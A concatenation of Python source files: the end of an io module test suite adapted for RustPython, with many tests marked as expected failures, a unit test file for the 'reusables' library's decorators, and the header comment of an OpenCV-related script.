return memoryview(arr)
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "RuntimeError: could not find io module state"
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_uninitialized(self):
super().test_uninitialized()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_non_text_encoding_codecs_are_rejected(self):
super().test_non_text_encoding_codecs_are_rejected()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_repr(self):
super().test_repr()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_encoding_errors_reading(self):
super().test_encoding_errors_reading()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_encoding_errors_writing(self):
super().test_encoding_errors_writing()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_newlines(self):
super().test_newlines()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_newlines_input(self):
super().test_newlines_input()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_newlines_output(self):
super().test_newlines_output()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_override_destructor(self):
super().test_override_destructor()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_read_one_by_one(self):
super().test_read_one_by_one()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_read_by_chunk(self):
super().test_read_by_chunk()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_issue1395_1(self):
super().test_issue1395_1()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_issue1395_2(self):
super().test_issue1395_2()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_issue1395_3(self):
super().test_issue1395_3()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_issue1395_4(self):
super().test_issue1395_4()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_issue1395_5(self):
super().test_issue1395_5()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_issue2282(self):
super().test_issue2282()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_flush_error_on_close(self):
super().test_flush_error_on_close()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_close_error_on_close(self):
super().test_close_error_on_close()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_nonnormalized_close_error_on_close(self):
super().test_nonnormalized_close_error_on_close()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_rawio(self):
super().test_rawio()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_rawio_write_through(self):
super().test_rawio_write_through()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reconfigure_write_through(self):
super().test_reconfigure_write_through()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_illegal_decoder(self):
super().test_illegal_decoder()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reconfigure_write_fromascii(self):
super().test_reconfigure_write_fromascii()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reconfigure_write(self):
super().test_reconfigure_write()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reconfigure_write_non_seekable(self):
super().test_reconfigure_write_non_seekable()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reconfigure_defaults(self):
super().test_reconfigure_defaults()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reconfigure_newline(self):
super().test_reconfigure_newline()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_del__CHUNK_SIZE_SystemError(self):
t = self.TextIOWrapper(self.BytesIO(), encoding='ascii')
with self.assertRaises(AttributeError):
del t._CHUNK_SIZE
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_newlines(self):
super().test_newlines()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_seek_with_encoder_state(self):
super().test_seek_with_encoder_state()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_multibyte_seek_and_tell(self):
super().test_multibyte_seek_and_tell()
@unittest.skip("TODO: RUSTPYTHON, incremental decoder")
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
self.assertRaises(TypeError, decoder.setstate, 42)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
def test_translate(self):
# issue 35062
for translate in (-2, -1, 1, 2):
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate)
self.check_newline_decoding_utf8(decoder)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=0)
self.assertEqual(decoder.decode(b"\r\r\n"), "\r\r\n")
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name in ("open", "open_code"):
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
# XXX RUSTPYTHON: universal mode is deprecated anyway, so I
# feel fine about skipping it
# with support.check_warnings(('', DeprecationWarning)):
# f = self.open(support.TESTFN, "U")
# self.assertEqual(f.name, support.TESTFN)
# self.assertEqual(f.buffer.name, support.TESTFN)
# self.assertEqual(f.buffer.raw.name, support.TESTFN)
# self.assertEqual(f.mode, "U")
# self.assertEqual(f.buffer.mode, "rb")
# self.assertEqual(f.buffer.raw.mode, "rb")
# f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
@unittest.skip("TODO: RUSTPYTHON, check if fd is seekable fileio")
def test_open_pipe_with_append(self):
# bpo-27805: Ignore ESPIPE from lseek() in open().
r, w = os.pipe()
self.addCleanup(os.close, r)
f = self.open(w, 'a')
self.addCleanup(f.close)
# Check that the file is marked non-seekable. On Windows, however, lseek
# somehow succeeds on pipes.
if sys.platform != 'win32':
self.assertFalse(f.seekable())
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
self.assertRaises(ValueError, f.read1)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
# TODO: RUSTPYTHON, cyclic gc
@unittest.expectedFailure
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(support.TESTFN, "wb")
self._check_warn_on_dealloc(support.TESTFN, "w")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with support.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
# 'x' mode fails if file is existing
with self.open(support.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(support.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
from test.support import SuppressCrashReport
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
crash = SuppressCrashReport()
crash.__enter__()
# don't call __exit__(): the crash occurs at Python shutdown
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
pattern = (r"Fatal Python error: could not acquire lock "
r"for <(_io\.)?BufferedWriter name='<{stream_name}>'> "
r"at interpreter shutdown, possibly due to "
r"daemon threads".format_map(locals()))
self.assertRegex(err, pattern)
else:
self.assertFalse(err.strip('.!'))
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
@unittest.skip("TODO: RUSTPYTHON, pyio version depends on memoryview.cast()")
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
if hasattr(signal, 'pthread_sigmask'):
# create the thread with SIGALRM signal blocked
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
t.start()
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signal.SIGALRM])
else:
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
signal.alarm(0)
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
signal.alarm(0)
rio.close()
os.close(w)
os.close(r)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
signal.alarm(0)
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
@unittest.skip("TODO: RUSTPYTHON, thread 'main' panicked at 'already borrowed: BorrowMutError'")
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
@unittest.skip("TODO: RUSTPYTHON, thread 'main' panicked at 'already borrowed: BorrowMutError'")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
@unittest.skip("TODO: RUSTPYTHON, hangs?")
def test_interrupted_write_text(self):
super().test_interrupted_write_text()
def load_tests(*args):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead,
SlowFlushRawIO)
all_members = io.__all__# + ["IncrementalNewlineDecoder"] XXX RUSTPYTHON
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == "__main__":
unittest.main()
|
test_wrappers.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import os
from .common_test_data import *
from reusables import (
unique,
lock_it,
time_it,
queue_it,
setup_logger,
log_exception,
remove_file_handlers,
retry_it,
catch_it,
ReusablesError,
)
@unique(exception=OSError, error_text="WHY ME!")
def unique_function_1(a):
return a
@unique(alt_return=33)
def unique_function_2(a):
return a
@unique(wait=1)
def unique_function_3():
return int(time.time())
class TestWrappers(BaseTestClass):
@classmethod
def tearDownClass(cls):
try:
os.unlink("out.log")
except OSError:
pass
def test_unique(self):
unique_function_1(1)
unique_function_2(1)
try:
unique_function_1(1)
except OSError as err:
assert "WHY ME!" in str(err)
assert unique_function_2(1) == 33
a = unique_function_3()
b = unique_function_3()
c = unique_function_3()
assert c > b > a
def test_locker(self):
import threading
@lock_it()
def func1():
import time
time.sleep(2)
start = time.time()
a = threading.Thread(target=func1)
b = threading.Thread(target=func1)
a.daemon = False
b.daemon = False
a.start()
b.start()
a.join()
b.join()
assert (time.time() - start) > 3
def test_time(self):
my_list = []
@time_it(append=my_list)
def func():
return 5 + 3
@time_it(log=True)
def func2():
return 7 + 3
func()
func2()
assert len(my_list) == 1
assert isinstance(my_list[0], float)
def test_queue(self):
try:
import queue
except ImportError:
import Queue as queue
q = queue.Queue()
@queue_it(q)
def func():
return 5 + 3
func()
assert q.get() == 8
def test_log_exception(self):
"""
Validate the custom log exception is raised correctly.
"""
@log_exception()
def unique_function_4():
raise Exception("Bad")
try:
unique_function_4()
except Exception as err:
assert "Bad" in str(err)
def test_log_exception_message(self):
"""
Validate the message passed to the custom log exception is written
correctly in the logs.
"""
setup_logger("my_logger", file_path="out.log")
message = "I would like to take this moment to say something " "interesting has happened. "
@log_exception("my_logger", message=message)
def unique_function_5():
raise Exception("Interesting")
try:
unique_function_5()
except Exception:
pass
remove_file_handlers("my_logger")
with open(os.path.join("out.log"), "r") as f:
assert message in f.readlines()[0]
os.remove(os.path.join("out.log"))
def test_retry_it(self):
@retry_it()
def a():
return True
def handle(herg):
return False
@retry_it(tries=2, wait=1, handler=handle)
def b(a, b=True):
raise Exception("Not yet")
assert a() is True
try:
b()
except ReusablesError:
pass
else:
raise AssertionError("Should have failed")
def test_catch_it(self):
def handle(*args, **kwargs):
print(args, kwargs)
return 10
@catch_it(handler=handle)
def ouch():
raise Exception("Wamp wamp")
@catch_it()
def b(a, b=True):
raise Exception("Not yet")
b()
assert ouch() == 10
if __name__ == "__main__":
unittest.main()
|
main.py
|
# author: Bartlomiej "furas" Burek (https://blog.furas.pl)
# date: 2022.05.10
# [python - OpenCV (-215:Assertion failed) !_src.empty() in function 'cvtColor - Stack Overflow](https://stackoverflow.com/questions/60551469/opencv-215assertion-failed-src-empty-in-function-cvtcolor/60551714)
